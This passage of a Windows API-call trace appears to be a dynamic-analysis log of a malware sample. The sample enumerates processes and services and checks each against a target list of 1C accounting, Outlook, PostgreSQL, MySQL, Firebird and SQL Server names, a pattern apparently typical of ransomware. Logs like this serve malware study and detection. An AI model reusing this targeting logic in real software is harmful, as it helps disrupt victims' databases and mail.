	[0166.293] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0166.293] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0166.293] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0166.293] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0166.293] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0166.293] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0166.293] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0166.293] lstrlenW (lpString="wininit.exe") returned 11
	[0166.293] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0166.294] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0166.294] lstrlenW (lpString="csrss.exe") returned 9
	[0166.294] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0166.294] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0166.294] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0166.294] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0166.294] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0166.294] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0166.295] lstrlenW (lpString="winlogon.exe") returned 12
	[0166.295] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0166.295] lstrlenW (lpString="services.exe") returned 12
	[0166.295] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0166.295] lstrlenW (lpString="lsass.exe") returned 9
	[0166.295] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0166.296] lstrlenW (lpString="lsm.exe") returned 7
	[0166.296] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.296] lstrlenW (lpString="svchost.exe") returned 11
	[0166.296] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.296] lstrlenW (lpString="svchost.exe") returned 11
	[0166.296] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.296] lstrlenW (lpString="svchost.exe") returned 11
	[0166.296] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.297] lstrlenW (lpString="svchost.exe") returned 11
	[0166.297] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.297] lstrlenW (lpString="svchost.exe") returned 11
	[0166.297] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0166.297] lstrlenW (lpString="audiodg.exe") returned 11
	[0166.297] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.298] lstrlenW (lpString="svchost.exe") returned 11
	[0166.298] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.298] lstrlenW (lpString="svchost.exe") returned 11
	[0166.298] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0166.298] lstrlenW (lpString="spoolsv.exe") returned 11
	[0166.298] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0166.299] lstrlenW (lpString="svchost.exe") returned 11
	[0166.299] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0166.299] lstrlenW (lpString="taskhost.exe") returned 12
	[0166.299] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0166.299] lstrlenW (lpString="dwm.exe") returned 7
	[0166.299] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0166.299] lstrlenW (lpString="explorer.exe") returned 12
	[0166.300] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0166.300] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0166.300] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0166.300] lstrlenW (lpString="reader_sl.exe") returned 13
	[0166.300] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0166.300] lstrlenW (lpString="drvinst.exe") returned 11
	[0166.300] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0166.301] lstrlenW (lpString="taskhost.exe") returned 12
	[0166.301] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x370, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1
	[0166.301] lstrlenW (lpString="consent.exe") returned 11
	[0166.301] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0166.301] lstrlenW (lpString="dllhost.exe") returned 11
	[0166.301] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0
	[0166.302] CloseHandle (hObject=0x3d0) returned 1
	[0166.302] Sleep (dwMilliseconds=0x1f4) 
	[0166.959] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0167.183] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0167.183] GetLastError () returned 0xea
	[0167.183] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0167.183] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0167.184] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0167.184] lstrlenW (lpString="Appinfo") returned 7
	[0167.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0167.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0167.184] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0167.184] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0167.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0167.184] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0167.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0167.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0167.184] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0167.184] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0167.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0167.184] lstrlenW (lpString="AudioSrv") returned 8
	[0167.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0167.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0167.184] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0167.184] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0167.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0167.184] lstrlenW (lpString="BFE") returned 3
	[0167.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0167.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0167.185] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0167.185] lstrlenW (lpString="CryptSvc") returned 8
	[0167.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0167.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0167.185] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0167.185] lstrlenW (lpString="CscService") returned 10
	[0167.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0167.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0167.185] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0167.185] lstrlenW (lpString="DcomLaunch") returned 10
	[0167.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0167.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0167.185] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0167.185] lstrlenW (lpString="Dhcp") returned 4
	[0167.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0167.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0167.185] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0167.185] lstrlenW (lpString="Dnscache") returned 8
	[0167.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0167.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0167.185] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0167.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0167.185] lstrlenW (lpString="DPS") returned 3
	[0167.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0167.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0167.186] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0167.186] lstrlenW (lpString="eventlog") returned 8
	[0167.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0167.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0167.186] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0167.186] lstrlenW (lpString="EventSystem") returned 11
	[0167.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0167.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0167.186] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0167.186] lstrlenW (lpString="gpsvc") returned 5
	[0167.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0167.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0167.186] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0167.186] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0167.186] lstrlenW (lpString="iphlpsvc") returned 8
	[0167.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0167.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0167.186] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0167.186] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0167.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0167.186] lstrlenW (lpString="LanmanServer") returned 12
	[0167.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0167.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0167.186] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0167.186] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0167.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0167.187] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0167.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0167.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0167.187] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0167.187] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0167.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0167.187] lstrlenW (lpString="lmhosts") returned 7
	[0167.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0167.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0167.187] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0167.187] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0167.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0167.187] lstrlenW (lpString="MMCSS") returned 5
	[0167.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0167.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0167.187] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0167.187] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0167.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0167.187] lstrlenW (lpString="MpsSvc") returned 6
	[0167.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0167.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0167.187] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0167.187] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0167.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0167.187] lstrlenW (lpString="Netman") returned 6
	[0167.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0167.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0167.187] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0167.187] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0167.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0167.187] lstrlenW (lpString="netprofm") returned 8
	[0167.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0167.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0167.188] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0167.188] lstrlenW (lpString="NlaSvc") returned 6
	[0167.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0167.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0167.188] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0167.188] lstrlenW (lpString="nsi") returned 3
	[0167.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0167.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0167.188] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0167.188] lstrlenW (lpString="PcaSvc") returned 6
	[0167.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0167.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0167.188] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0167.188] lstrlenW (lpString="PlugPlay") returned 8
	[0167.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0167.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0167.188] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0167.188] lstrlenW (lpString="Power") returned 5
	[0167.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0167.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0167.188] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0167.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0167.188] lstrlenW (lpString="ProfSvc") returned 7
	[0167.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0167.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0167.189] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0167.189] lstrlenW (lpString="RpcEptMapper") returned 12
	[0167.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0167.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0167.189] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0167.189] lstrlenW (lpString="RpcSs") returned 5
	[0167.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0167.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0167.189] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0167.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
